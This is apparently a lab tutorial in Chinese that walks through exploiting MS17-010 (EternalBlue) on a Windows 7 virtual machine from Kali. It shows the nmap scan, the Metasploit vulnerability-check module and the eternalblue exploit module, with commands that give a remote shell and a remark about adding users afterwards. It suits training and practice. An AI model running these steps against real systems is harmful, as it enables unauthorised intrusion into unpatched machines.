本实验在虚拟机环境下进行!
准备虚拟机两台:
Kali
Win7 64位 (要将防火墙关闭)
- 先看看两台机器的ip地址是多少
kali的ip是 192.168.0.102
win7的ip是192.168.0.101
- 接着进行端口扫描
使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫描,比普通扫描要快,-sV是版本检测,-Pn是不对目标主机进行存活性判断,直接扫描,注意要把win7的防火墙关闭了,不然会被拦截
得到结果如下
不同的机子可能扫出来的结果不一样,但我们只需要看445端口开放了即可
- 把msfconsole开启
Kali终端输入msfconsole,使用工具msfconsole
msfconsole的启动图像每次都不一样。。。图像不一样不用担心
- 先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵
先show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip
set RHOSTS 192.168.0.101
接着输入run执行探测
我们看到红线的这一行,他说这个主机很有可能具有ms17-010的漏洞
这是就基本可以确认,ms17-010可以入侵该win7
- 使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
使用这个模块,我们show targets看一下这个模块适用于哪些系统的主机
可以看到,win7和server 2008 r2都适用
我们show options来看看有哪些选项
可以看出,我们只需要设置RHOST,即要攻击的主机ip即可
set RHOST 192.168.0.101
接着run执行攻击
程序就会运行,当看到WIN的时候,说明我们已经渗透进win7里面去了,按下回车出现了win7的cmd,这是已经是渗透成功了。但有时候不一定会成功,会返回FAIL,说明这个系统打了补丁,这个漏洞已经没有威力了。
之后就可以建用户开端口了,既然已经渗透成功了。就不描述了。
实验完成